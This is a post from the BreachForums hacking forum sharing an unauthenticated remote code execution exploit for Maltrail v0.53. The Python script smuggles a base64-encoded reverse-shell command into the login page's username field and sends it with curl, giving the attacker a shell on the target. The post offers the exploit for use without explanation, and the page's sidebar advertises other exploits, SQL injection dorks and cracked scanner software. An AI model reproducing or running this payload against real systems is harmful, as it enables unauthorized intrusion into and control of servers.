JOIN BREACHFORUMS TELEGRAM
Maltrail v0.53 - Unauthenticated RCE
by luszxis - Friday January 26, 2024 at 08:59 PM
Advanced User

Posts: 91
Threads: 35
Joined: Dec 2023
Reputation: 1
#1
Jan 26, 2024, 08:59 PM (This post was last modified: Jan 26, 2024, 09:03 PM by luszxis.)
Maltrail v0.53 - Unauthenticated RCE

Fuck YOU..!

- ! No info available ! -
Exploit:
import sys;
import os;
import base64;

def main():
listening_IP = None
listening_PORT = None
target_URL = None

if len(sys.argv) != 4:
print("Error. Needs listening IP, PORT and target URL.")
return(-1)

listening_IP = sys.argv[1]
listening_PORT = sys.argv[2]
target_URL = sys.argv[3] + "/login"
print("Running exploit on " + str(target_URL))
curl_cmd(listening_IP, listening_PORT, target_URL)

def curl_cmd(my_ip, my_port, target_url):
payload = f'python3 -c \'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{my_ip}",{my_port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")\''
encoded_payload = base64.b64encode(payload.encode()).decode()  # encode the payload in Base64
command = f"curl '{target_url}' --data 'username=;`echo+\"{encoded_payload}\"+|+base64+-d+|+sh`'"
os.system(command)

if __name__ == "__main__":
  main()
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  {SECRET} DATABASE OF EXPLOITS lulagain 432 25,409 Today, 12:12 AM
Last Post: fokfdo223
  New Zer0 Day Wordpress A3g00n 79 3,007 Yesterday, 04:09 PM
Last Post: baku
  new wordpress website takeover vuln (video + poc ) zinzeur 314 28,041 Yesterday, 03:54 PM
Last Post: baku
  Google Dorks for finding SQL injection vulnerabilities and other security issues 1yush 66 3,026 Apr 29, 2026, 08:51 PM
Last Post: Yjuddur
  Acunetix Premium Cracked v24 Full Activated A3g00n 22 1,353 Apr 29, 2026, 09:22 AM
Last Post: Usercomplex

Forum Jump:


 Users browsing this forum: 1 Guest(s)